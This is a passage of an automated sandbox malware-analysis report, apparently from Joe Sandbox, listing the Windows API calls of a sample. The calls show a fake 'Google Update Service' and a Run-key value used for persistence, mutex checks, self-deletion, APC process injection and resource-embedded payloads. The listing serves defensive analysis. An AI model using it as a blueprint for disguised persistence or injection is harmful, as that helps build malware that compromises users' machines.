      • Part of subcall function 00401480: CreateWellKnownSid.ADVAPI32(00000016,00000000,?,?), ref: 004014B3
      • Part of subcall function 00401480: GetTokenInformation.ADVAPI32(?,00000001,00000000,00000000,?), ref: 004014D3
      • Part of subcall function 00401480: RtlGetLastWin32Error.NTDLL ref: 004014D5
      • Part of subcall function 00401480: RtlAllocateHeap.NTDLL(00970000,00000008,?), ref: 004014EE
      • Part of subcall function 00401480: GetTokenInformation.ADVAPI32(?,00000001,00000000,?,?), ref: 00401509
      • Part of subcall function 00401480: EqualSid.ADVAPI32(00000000,?), ref: 00401516
      • Part of subcall function 00401480: RtlFreeHeap.NTDLL(00970000,00000000,00000000), ref: 0040152F
      • Part of subcall function 00401480: CloseHandle.KERNEL32(?), ref: 0040153B
    • CloseHandle.KERNEL32(00000000), ref: 00402670
    Memory Dump Source
    • Source File: 00000004.00000002.314783051.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000004.00000002.314772170.00400000.00000002.sdmp
    • Associated: 00000004.00000002.314789999.00404000.00000002.sdmp
    • Associated: 00000004.00000002.314795405.00405000.00000004.sdmp
    • Associated: 00000004.00000002.314805556.00406000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_PTnbUd10.jbxd
    APIs
    • VirtualProtect.KERNEL32(00438CB3,00000FE6,00000040), ref: 004178AC
    Memory Dump Source
    • Source File: 00000004.00000001.250352668.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000004.00000001.250339391.00400000.00000002.sdmp
    • Associated: 00000004.00000001.250417259.0045C000.00000002.sdmp
    • Associated: 00000004.00000001.250443181.00463000.00000008.sdmp
    • Associated: 00000004.00000001.250473245.0047B000.00000004.sdmp
    • Associated: 00000004.00000001.250493441.0047C000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_1_400000_PTnbUd10.jbxd

    Non-executed Functions

    APIs
    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002), ref: 004023AA
    • CreateServiceW.ADVAPI32(00000000,googleupdate,Google Update Service,000F01FF,00000010,00000002,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,7C831F63), ref: 004023E4
    • RtlGetLastWin32Error.NTDLL ref: 004023EE
    • OpenServiceW.ADVAPI32(00000000,googleupdate,000F01FF), ref: 00402406
    • DeleteService.ADVAPI32(00000000,?,00402CB7,?,?,00000000), ref: 00402413
    • CloseServiceHandle.ADVAPI32(00000000), ref: 0040241C
    • CloseServiceHandle.ADVAPI32(00000000), ref: 00402427
    • CloseServiceHandle.ADVAPI32(00000000), ref: 0040243C
    • CloseServiceHandle.ADVAPI32(00000000), ref: 0040243F
    Memory Dump Source
    • Source File: 00000004.00000002.314783051.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000004.00000002.314772170.00400000.00000002.sdmp
    • Associated: 00000004.00000002.314789999.00404000.00000002.sdmp
    • Associated: 00000004.00000002.314795405.00405000.00000004.sdmp
    • Associated: 00000004.00000002.314805556.00406000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_PTnbUd10.jbxd
    APIs
    • GetModuleFileNameW.KERNEL32(00000000,?,00000168,?,00000000), ref: 00402DDA
    • SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00402DEF
    • StrStrIW.SHLWAPI(?,Roaming), ref: 00402E07
    • lstrcpyW.KERNEL32(00000000,Local), ref: 00402E13
    • lstrcatW.KERNEL32(?,00404258), ref: 00402E2B
    • lstrlenW.KERNEL32(?), ref: 00402E34
    • StrStrIW.SHLWAPI(?,?), ref: 00402E52
    • StrStrIW.SHLWAPI(?,temp), ref: 00402E68
    • GetCommandLineW.KERNEL32 ref: 00402E72
    • StrStrIW.SHLWAPI(00000000,?), ref: 00402E82
    • DeleteFileW.KERNEL32(00000000), ref: 00402E91
    • Sleep.KERNEL32(00000064), ref: 00402EA1
    • DeleteFileW.KERNEL32(00000000), ref: 00402EA9
      • Part of subcall function 00402CF0: lstrlenW.KERNEL32(?), ref: 00402CFB
      • Part of subcall function 00402CF0: lstrcpyW.KERNEL32(?,00404320), ref: 00402D18
      • Part of subcall function 00402CF0: lstrcatW.KERNEL32(?,ftware\Mi), ref: 00402D30
      • Part of subcall function 00402CF0: lstrcatW.KERNEL32(?,crosoft\Wi), ref: 00402D3E
      • Part of subcall function 00402CF0: lstrcatW.KERNEL32(?,ndows\CurrentVers), ref: 00402D4C
      • Part of subcall function 00402CF0: lstrcatW.KERNEL32(?,ion\Run), ref: 00402D5A
      • Part of subcall function 00402CF0: RegCreateKeyExW.ADVAPI32(80000001,?,00000000,0040425C,00000000,00000002,00000000,?,00000000), ref: 00402D7B
      • Part of subcall function 00402CF0: RegSetValueExW.ADVAPI32(?,GoogleUpdate,00000000,00000001,?,00000002), ref: 00402D98
      • Part of subcall function 00402CF0: RegCloseKey.ADVAPI32(?), ref: 00402DA2
    • OpenMutexW.KERNEL32(00100000,00000000,Global\zx5fwtw4ep), ref: 00402EC6
    • CloseHandle.KERNEL32(00000000), ref: 00402ED1
    • ExitProcess.KERNEL32(00000000,?,00000000), ref: 00402ED9
      • Part of subcall function 00402AA0: CreateFileMappingW.KERNEL32(000000FF,00000000,00000040,00000000,00000000,00000000), ref: 00402AB9
      • Part of subcall function 00402AA0: MapViewOfFile.KERNEL32(00000000,0000000E,00000000,00000000,00000000), ref: 00402ACE
      • Part of subcall function 004025A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004025B8
      • Part of subcall function 004025A0: Process32FirstW.KERNEL32(00000000,0000022C), ref: 004025C8
      • Part of subcall function 004025A0: lstrcmpiW.KERNEL32(?,00000000), ref: 004025EB
      • Part of subcall function 004025A0: Process32NextW.KERNEL32(00000000,0000022C), ref: 0040260A
      • Part of subcall function 004025A0: CloseHandle.KERNEL32(00000000), ref: 00402618
      • Part of subcall function 004025A0: RtlGetLastWin32Error.NTDLL ref: 0040261E
      • Part of subcall function 00401190: QueryPerformanceCounter.KERNEL32(00000000), ref: 004011A4
      • Part of subcall function 00401190: QueryPerformanceCounter.KERNEL32(1/@), ref: 004011DE
      • Part of subcall function 00401190: QueryPerformanceCounter.KERNEL32(?), ref: 00401228
    • lstrcatW.KERNEL32(?,?), ref: 00402F41
    • lstrcatW.KERNEL32(?,.exe), ref: 00402F4F
      • Part of subcall function 00401320: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00401344
      • Part of subcall function 00401320: GetFileSize.KERNEL32(00000000,00000000), ref: 00401353
      • Part of subcall function 00401320: CreateFileW.KERNEL32(00000000,40000000,00000001,00000000,00000002,00000000,00000000), ref: 00401377
      • Part of subcall function 00401320: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 004013C6
      • Part of subcall function 00401320: SetFilePointer.KERNEL32(00000000,-00000200,00000000,00000000), ref: 004013D6
      • Part of subcall function 00401320: ReadFile.KERNEL32(00000000,?,00000200,00000000,00000000), ref: 004013FA
      • Part of subcall function 00401320: WriteFile.KERNEL32(00000000,?,00000200,?,00000000), ref: 00401427
      • Part of subcall function 00401320: CloseHandle.KERNEL32(00000000), ref: 00401457
      • Part of subcall function 00401320: CloseHandle.KERNEL32(00000000), ref: 0040145E
    • SetServiceStatus.ADVAPI32(00000000,00405014), ref: 004030C1
      • Part of subcall function 00401550: lstrlenW.KERNEL32(?), ref: 0040155C
      • Part of subcall function 00401550: RtlAllocateHeap.NTDLL(00970000,00000008,00000000), ref: 00401572
      • Part of subcall function 00401550: lstrlenW.KERNEL32(|/@), ref: 004015A1
      • Part of subcall function 00401550: RtlAllocateHeap.NTDLL(00970000,00000008), ref: 004015B7
      • Part of subcall function 00401550: RtlFreeHeap.NTDLL(00970000,00000000,00000000), ref: 004015CD
      • Part of subcall function 00401550: CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000020,00000000,00000000,?,?), ref: 0040163F
      • Part of subcall function 00401550: CloseHandle.KERNEL32(?), ref: 00401653
      • Part of subcall function 00401550: CloseHandle.KERNEL32(?), ref: 00401659
      • Part of subcall function 00401550: RtlFreeHeap.NTDLL(00970000,00000000,00000000), ref: 0040166A
      • Part of subcall function 00401550: RtlFreeHeap.NTDLL(00970000,00000000,00000000), ref: 00401676
    • ExitProcess.KERNEL32(00000000), ref: 00402F81
    • RegisterServiceCtrlHandlerW.ADVAPI32(Google Update Service,004030D0), ref: 00402F9B
    • SetServiceStatus.ADVAPI32(00000000,00405014), ref: 00402FFF
    • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 0040300A
    • RtlGetLastWin32Error.NTDLL ref: 00403025
    • SetServiceStatus.ADVAPI32(00000000,00405014), ref: 00403042
    • SetServiceStatus.ADVAPI32(00000000,00405014), ref: 00403072
    • CreateThread.KERNEL32(00000000,00000000,00403130,00000000), ref: 0040307E
    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00403087
    • CloseHandle.KERNEL32(FFFFFFFF), ref: 00403093
    Memory Dump Source
    • Source File: 00000004.00000002.314783051.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000004.00000002.314772170.00400000.00000002.sdmp
    • Associated: 00000004.00000002.314789999.00404000.00000002.sdmp
    • Associated: 00000004.00000002.314795405.00405000.00000004.sdmp
    • Associated: 00000004.00000002.314805556.00406000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_PTnbUd10.jbxd
    APIs
    • NtMapViewOfSection.NTDLL(00000000,00000000,?,00000000), ref: 0040286D
    • GetProcessId.KERNEL32(00000000), ref: 00402893
    • GetProcessId.KERNEL32(00000000), ref: 0040289A
    • VirtualAlloc.KERNEL32(00000000,00020000,00003000,00000004), ref: 004028A9
    • NtQuerySystemInformation.NTDLL(00000005,00000000,00020000,?), ref: 004028CE
    • RtlRestoreLastWin32Error.NTDLL(00000000), ref: 0040291D
    • OpenThread.KERNEL32(00000010,00000000,00000000), ref: 00402927
    • RtlRestoreLastWin32Error.NTDLL(00000000), ref: 00402939
    • RtlGetLastWin32Error.NTDLL ref: 0040293F
    • GetModuleHandleW.KERNEL32(ntdll.dll), ref: 00402952
    • GetProcAddress.KERNEL32(00000000), ref: 00402959
    • RtlGetLastWin32Error.NTDLL ref: 00402976
    • CloseHandle.KERNEL32(00000000), ref: 0040297F
    • Sleep.KERNEL32(00001388), ref: 0040299C
    • OpenMutexW.KERNEL32(00100000,00000000,Global\zx5fwtw4ep), ref: 004029AE
    • CloseHandle.KERNEL32(00000000), ref: 004029DE
    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00402A06
    Memory Dump Source
    • Source File: 00000004.00000002.314783051.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000004.00000002.314772170.00400000.00000002.sdmp
    • Associated: 00000004.00000002.314789999.00404000.00000002.sdmp
    • Associated: 00000004.00000002.314795405.00405000.00000004.sdmp
    • Associated: 00000004.00000002.314805556.00406000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_PTnbUd10.jbxd
    APIs
    • lstrlenW.KERNEL32(?), ref: 00402CFB
    • lstrcpyW.KERNEL32(?,00404320), ref: 00402D18
    • lstrcatW.KERNEL32(?,ftware\Mi), ref: 00402D30
    • lstrcatW.KERNEL32(?,crosoft\Wi), ref: 00402D3E
    • lstrcatW.KERNEL32(?,ndows\CurrentVers), ref: 00402D4C
    • lstrcatW.KERNEL32(?,ion\Run), ref: 00402D5A
    • RegCreateKeyExW.ADVAPI32(80000001,?,00000000,0040425C,00000000,00000002,00000000,?,00000000), ref: 00402D7B
    • RegSetValueExW.ADVAPI32(?,GoogleUpdate,00000000,00000001,?,00000002), ref: 00402D98
    • RegCloseKey.ADVAPI32(?), ref: 00402DA2
    Memory Dump Source
    • Source File: 00000004.00000002.314783051.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000004.00000002.314772170.00400000.00000002.sdmp
    • Associated: 00000004.00000002.314789999.00404000.00000002.sdmp
    • Associated: 00000004.00000002.314795405.00405000.00000004.sdmp
    • Associated: 00000004.00000002.314805556.00406000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_PTnbUd10.jbxd
    APIs
    • RtlGetLastWin32Error.NTDLL ref: 004026AE
      • Part of subcall function 00402210: RtlGetLastWin32Error.NTDLL ref: 00402274
    • GetProcessId.KERNEL32(00000000), ref: 004026E2
    • VirtualAlloc.KERNEL32(00000000,00020000,00003000,00000004), ref: 004026F9
    • NtQuerySystemInformation.NTDLL(00000005,00000000,00020000,?), ref: 0040271E
    • OpenThread.KERNEL32(00000010,00000000,00000000), ref: 00402774
      • Part of subcall function 004022D0: wsprintfW.USER32 ref: 00402380
      • Part of subcall function 004022D0: OutputDebugStringW.KERNEL32(?), ref: 00402390
    • CloseHandle.KERNEL32(00000000), ref: 004027B2
    • Sleep.KERNEL32(00001388), ref: 004027BC
    • OpenMutexW.KERNEL32(00100000,00000000,Global\zx5fwtw4ep), ref: 004027CE
    • CloseHandle.KERNEL32(00000000), ref: 004027F4
    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0040281C
    Memory Dump Source
    • Source File: 00000004.00000002.314783051.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000004.00000002.314772170.00400000.00000002.sdmp
    • Associated: 00000004.00000002.314789999.00404000.00000002.sdmp
    • Associated: 00000004.00000002.314795405.00405000.00000004.sdmp
    • Associated: 00000004.00000002.314805556.00406000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_PTnbUd10.jbxd
    APIs
    • OpenSemaphoreW.KERNEL32 ref: 00401B16
    • GetModuleHandleW.KERNEL32 ref: 00401BA4
    • RtlAllocateHeap.NTDLL(00970000,00000008,?), ref: 00401C87
    • lstrcmpiW.KERNEL32(ntdll.dll,00000000), ref: 00401D24
    • GetModuleHandleW.KERNEL32(00000000), ref: 00401D30
    • RtlFreeHeap.NTDLL(00970000,00000000,00000000), ref: 00401D40
    • GetModuleHandleW.KERNEL32(00000000), ref: 00401D6C
    • RtlFreeHeap.NTDLL(00970000,00000000,00000000), ref: 00401D93
    Memory Dump Source
    • Source File: 00000004.00000002.314783051.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000004.00000002.314772170.00400000.00000002.sdmp
    • Associated: 00000004.00000002.314789999.00404000.00000002.sdmp
    • Associated: 00000004.00000002.314795405.00405000.00000004.sdmp
    • Associated: 00000004.00000002.314805556.00406000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_PTnbUd10.jbxd
    APIs
    • RtlAllocateHeap.NTDLL(00970000,00000008,?), ref: 00401F90
    • RtlAllocateHeap.NTDLL(00970000,00000008,?), ref: 00401FD5
    • RtlFreeHeap.NTDLL(00970000,00000000,00000000), ref: 00401FF2
    • RtlAllocateHeap.NTDLL(00970000,00000008,?), ref: 00402039
    • RtlFreeHeap.NTDLL(00970000,00000000,00000000), ref: 004020DB
      • Part of subcall function 004016E0: RtlFreeHeap.NTDLL(00970000,00000000,?), ref: 004016F9
    • RtlFreeHeap.NTDLL(00970000,00000000), ref: 004020AF
    • RtlFreeHeap.NTDLL(00970000,00000000,00000000), ref: 004020C2
    • RtlFreeHeap.NTDLL(00970000,00000000), ref: 0040210E
    • RtlFreeHeap.NTDLL(00970000,00000000,00000000), ref: 00402121
    • RtlFreeHeap.NTDLL(00970000,00000000,00000000), ref: 0040213A
    Memory Dump Source
    • Source File: 00000004.00000002.314783051.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000004.00000002.314772170.00400000.00000002.sdmp
    • Associated: 00000004.00000002.314789999.00404000.00000002.sdmp
    • Associated: 00000004.00000002.314795405.00405000.00000004.sdmp
    • Associated: 00000004.00000002.314805556.00406000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_PTnbUd10.jbxd
    APIs
    • GetModuleHandleW.KERNEL32(00000000), ref: 00402515
    • FindResourceW.KERNEL32(00000000,xfevepwmw,0000000A), ref: 00402525
    • LoadResource.KERNEL32(00000000,00000000), ref: 00402533
    • SizeofResource.KERNEL32(00000000,00000000), ref: 00402541
    • LockResource.KERNEL32(00000000), ref: 0040254D
    • GetCurrentProcess.KERNEL32 ref: 0040255D
    • IsWow64Process.KERNEL32(00000000), ref: 00402564
      • Part of subcall function 00402450: GetModuleHandleW.KERNEL32(00000000), ref: 00402454
      • Part of subcall function 00402450: FindResourceW.KERNEL32(00000000,vdfd1f6ed,0000000A), ref: 00402464
      • Part of subcall function 00402450: LoadResource.KERNEL32(00000000,00000000), ref: 00402476
      • Part of subcall function 00402450: SizeofResource.KERNEL32(00000000,00000000), ref: 00402488
      • Part of subcall function 00402450: LockResource.KERNEL32(00000000), ref: 00402494
      • Part of subcall function 004024B0: GetModuleHandleW.KERNEL32(00000000), ref: 004024B4
      • Part of subcall function 004024B0: FindResourceW.KERNEL32(00000000,be2e393ne,0000000A), ref: 004024C4
      • Part of subcall function 004024B0: LoadResource.KERNEL32(00000000,00000000), ref: 004024D6
      • Part of subcall function 004024B0: SizeofResource.KERNEL32(00000000,00000000), ref: 004024E8
      • Part of subcall function 004024B0: LockResource.KERNEL32(00000000), ref: 004024F4
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.314783051.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000004.00000002.314772170.00400000.00000002.sdmp
    • Associated: 00000004.00000002.314789999.00404000.00000002.sdmp
    • Associated: 00000004.00000002.314795405.00405000.00000004.sdmp
    • Associated: 00000004.00000002.314805556.00406000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_PTnbUd10.jbxd
    APIs
      • Part of subcall function 00402AA0: CreateFileMappingW.KERNEL32(000000FF,00000000,00000040,00000000,00000000,00000000), ref: 00402AB9
      • Part of subcall function 00402AA0: MapViewOfFile.KERNEL32(00000000,0000000E,00000000,00000000,00000000), ref: 00402ACE
      • Part of subcall function 004025A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004025B8
      • Part of subcall function 004025A0: Process32FirstW.KERNEL32(00000000,0000022C), ref: 004025C8
      • Part of subcall function 004025A0: lstrcmpiW.KERNEL32(?,00000000), ref: 004025EB
      • Part of subcall function 004025A0: Process32NextW.KERNEL32(00000000,0000022C), ref: 0040260A
      • Part of subcall function 004025A0: CloseHandle.KERNEL32(00000000), ref: 00402618
      • Part of subcall function 004025A0: RtlGetLastWin32Error.NTDLL ref: 0040261E
    • RtlRestoreLastWin32Error.NTDLL(00000000), ref: 00402B4F
    • OpenProcess.KERNEL32(00000408,00000000,00000340), ref: 00402B5D
      • Part of subcall function 00402680: RtlGetLastWin32Error.NTDLL ref: 004026AE
      • Part of subcall function 00402680: GetProcessId.KERNEL32(00000000), ref: 004026E2
      • Part of subcall function 00402680: VirtualAlloc.KERNEL32(00000000,00020000,00003000,00000004), ref: 004026F9
      • Part of subcall function 00402680: NtQuerySystemInformation.NTDLL(00000005,00000000,00020000,?), ref: 0040271E
      • Part of subcall function 00402680: OpenThread.KERNEL32(00000010,00000000,00000000), ref: 00402774
      • Part of subcall function 00402680: CloseHandle.KERNEL32(00000000), ref: 004027B2
      • Part of subcall function 00402680: Sleep.KERNEL32(00001388), ref: 004027BC
      • Part of subcall function 00402680: OpenMutexW.KERNEL32(00100000,00000000,Global\zx5fwtw4ep), ref: 004027CE
      • Part of subcall function 00402680: CloseHandle.KERNEL32(00000000), ref: 004027F4
      • Part of subcall function 00402680: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0040281C
    • CloseHandle.KERNEL32(00000000), ref: 00402B6F
    • RtlGetLastWin32Error.NTDLL ref: 00402B77
    • OpenProcess.KERNEL32(00000408,00000000,00000340), ref: 00402B85
    • GetModuleHandleW.KERNEL32(00000000), ref: 00402B9F
      • Part of subcall function 00402830: NtMapViewOfSection.NTDLL(00000000,00000000,?,00000000), ref: 0040286D
      • Part of subcall function 00402830: GetProcessId.KERNEL32(00000000), ref: 00402893
      • Part of subcall function 00402830: GetProcessId.KERNEL32(00000000), ref: 0040289A
      • Part of subcall function 00402830: VirtualAlloc.KERNEL32(00000000,00020000,00003000,00000004), ref: 004028A9
      • Part of subcall function 00402830: NtQuerySystemInformation.NTDLL(00000005,00000000,00020000,?), ref: 004028CE
      • Part of subcall function 00402830: RtlRestoreLastWin32Error.NTDLL(00000000), ref: 0040291D
      • Part of subcall function 00402830: OpenThread.KERNEL32(00000010,00000000,00000000), ref: 00402927
      • Part of subcall function 00402830: RtlRestoreLastWin32Error.NTDLL(00000000), ref: 00402939
      • Part of subcall function 00402830: RtlGetLastWin32Error.NTDLL ref: 0040293F
      • Part of subcall function 00402830: GetModuleHandleW.KERNEL32(ntdll.dll), ref: 00402952
      • Part of subcall function 00402830: GetProcAddress.KERNEL32(00000000), ref: 00402959
      • Part of subcall function 00402830: RtlGetLastWin32Error.NTDLL ref: 00402976
      • Part of subcall function 00402830: CloseHandle.KERNEL32(00000000), ref: 0040297F
      • Part of subcall function 00402830: Sleep.KERNEL32(00001388), ref: 0040299C
      • Part of subcall function 00402830: OpenMutexW.KERNEL32(00100000,00000000,Global\zx5fwtw4ep), ref: 004029AE
      • Part of subcall function 00402830: CloseHandle.KERNEL32(00000000), ref: 004029DE
      • Part of subcall function 00402830: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00402A06
    • CloseHandle.KERNEL32(00000000), ref: 00402B97
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.314783051.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000004.00000002.314772170.00400000.00000002.sdmp
    • Associated: 00000004.00000002.314789999.00404000.00000002.sdmp
    • Associated: 00000004.00000002.314795405.00405000.00000004.sdmp
    • Associated: 00000004.00000002.314805556.00406000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_PTnbUd10.jbxd
    APIs
    • GetModuleHandleW.KERNEL32(00000000), ref: 004024B4
    • FindResourceW.KERNEL32(00000000,be2e393ne,0000000A), ref: 004024C4
    • LoadResource.KERNEL32(00000000,00000000), ref: 004024D6
    • SizeofResource.KERNEL32(00000000,00000000), ref: 004024E8
    • LockResource.KERNEL32(00000000), ref: 004024F4
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.314783051.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000004.00000002.314772170.00400000.00000002.sdmp
    • Associated: 00000004.00000002.314789999.00404000.00000002.sdmp
    • Associated: 00000004.00000002.314795405.00405000.00000004.sdmp
    • Associated: 00000004.00000002.314805556.00406000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_PTnbUd10.jbxd
    APIs
    • GetModuleHandleW.KERNEL32(00000000), ref: 00402454
    • FindResourceW.KERNEL32(00000000,vdfd1f6ed,0000000A), ref: 00402464
    • LoadResource.KERNEL32(00000000,00000000), ref: 00402476
    • SizeofResource.KERNEL32(00000000,00000000), ref: 00402488
    • LockResource.KERNEL32(00000000), ref: 00402494
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.314783051.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000004.00000002.314772170.00400000.00000002.sdmp
    • Associated: 00000004.00000002.314789999.00404000.00000002.sdmp
    • Associated: 00000004.00000002.314795405.00405000.00000004.sdmp
    • Associated: 00000004.00000002.314805556.00406000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_PTnbUd10.jbxd
    APIs
    • GetModuleFileNameW.KERNEL32(00000000,?,00000168), ref: 00403149
    • CreateProcessW.KERNEL32(?,0040425C,00000000,00000000,00000000,04000000,00000000,00000000,?,?), ref: 0040319F
    • CloseHandle.KERNEL32(?), ref: 004031B0
    • CloseHandle.KERNEL32(?), ref: 004031B7
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.314783051.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000004.00000002.314772170.00400000.00000002.sdmp
    • Associated: 00000004.00000002.314789999.00404000.00000002.sdmp
    • Associated: 00000004.00000002.314795405.00405000.00000004.sdmp
    • Associated: 00000004.00000002.314805556.00406000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_PTnbUd10.jbxd
    APIs
    • QueryPerformanceCounter.KERNEL32(00000000), ref: 004011A4
    • QueryPerformanceCounter.KERNEL32(1/@), ref: 004011DE
    • QueryPerformanceCounter.KERNEL32(?), ref: 00401228
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.314783051.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000004.00000002.314772170.00400000.00000002.sdmp
    • Associated: 00000004.00000002.314789999.00404000.00000002.sdmp
    • Associated: 00000004.00000002.314795405.00405000.00000004.sdmp
    • Associated: 00000004.00000002.314805556.00406000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_PTnbUd10.jbxd
    APIs
      • Part of subcall function 00401710: RtlRestoreLastWin32Error.NTDLL(00000000), ref: 004017C3
    • wsprintfW.USER32 ref: 00402380
    • OutputDebugStringW.KERNEL32(?), ref: 00402390
    Strings
    • ZwQueueApcThread: error code = %x, xrefs: 0040237A
    • ZwQueueApcThread, xrefs: 00402315
    Memory Dump Source
    • Source File: 00000004.00000002.314783051.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000004.00000002.314772170.00400000.00000002.sdmp
    • Associated: 00000004.00000002.314789999.00404000.00000002.sdmp
    • Associated: 00000004.00000002.314795405.00405000.00000004.sdmp
    • Associated: 00000004.00000002.314805556.00406000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_PTnbUd10.jbxd
    APIs
    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 004012A6
    • SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 004012B5
    • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004012D1
    • WriteFile.KERNEL32(00000000,?,00000000,00000000), ref: 004012F5
    Memory Dump Source
    • Source File: 00000004.00000002.314783051.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000004.00000002.314772170.00400000.00000002.sdmp
    • Associated: 00000004.00000002.314789999.00404000.00000002.sdmp
    • Associated: 00000004.00000002.314795405.00405000.00000004.sdmp
    • Associated: 00000004.00000002.314805556.00406000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_PTnbUd10.jbxd

    Executed Functions

    APIs
    • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 003E014E
    • VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 003E0275
    • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000004), ref: 003E029A
    • VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,?), ref: 003E02EE
    • LoadLibraryA.KERNEL32(?), ref: 003E0339
    • VirtualProtect.KERNEL32(?,00001000,00000002,?), ref: 003E0433
    • VirtualProtect.KERNEL32(?,?,00000001,?,?), ref: 003E0482
    Memory Dump Source
    • Source File: 00000005.00000002.410163326.003E0000.00000040.sdmp, Offset: 003E0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_3e0000_yDDWPXuvXqBkqjT.jbxd

    Non-executed Functions

    Executed Functions

    APIs
      • Part of subcall function 00EF6B72: lstrlenW.KERNEL32(0290BAD8), ref: 00EF6B7B
      • Part of subcall function 00EF3334: HeapFree.KERNEL32(00000000,?,?,00EFD1CE,02909E90,0290ACE0,00EFD53F,?,?,00EFBAB7), ref: 00EF6992
    • CreateNamedPipeW.KERNEL32(00FCFDB0,00000003,00000006,000000FF,00800000,00800000,00000000,00000000), ref: 00EF6BF7
    • ConnectNamedPipe.KERNEL32(00000000,00000000), ref: 00EF6C06
    • GetLastError.KERNEL32(?,?,?,00FCFDB0), ref: 00EF6C10
      • Part of subcall function 00EF6955: HeapAlloc.KERNEL32(00000008,?,?,00EF4089,00000000,00000000,?,00EF4FDD,00000000,00000000,?,00EF391E,02908008,02908008,00EF328A,00EFD51B), ref: 00EF6963
    • CreateThread.KERNEL32(00000000,00000000,00EF6A7A,00000000), ref: 00EF6C4F
    • CloseHandle.KERNEL32(00000000), ref: 00EF6C64
    Memory Dump Source
    • Source File: 00000006.00000002.615507079.00EF0000.00000040.sdmp, Offset: 00EF0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_ef0000_svchost.jbxd
    APIs
    • socket.WS2_32(00000002,00000002,00000000), ref: 00EFA79B
    • bind.WS2_32(00000000,0294FED0,00000010), ref: 00EFA7D0
    • WSAGetLastError.WS2_32 ref: 00EFA7DB
    • closesocket.WS2_32(00000000), ref: 00EFA7E4
    • WSASetLastError.WS2_32(00000000), ref: 00EFA7EB
    Memory Dump Source
    • Source File: 00000006.00000002.615507079.00EF0000.00000040.sdmp, Offset: 00EF0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_ef0000_svchost.jbxd
    APIs
    • select.WS2_32(00000000,00000001,00000000,00000000,00000000), ref: 00EFA8B2
    • WSAGetLastError.WS2_32 ref: 00EFA8BD
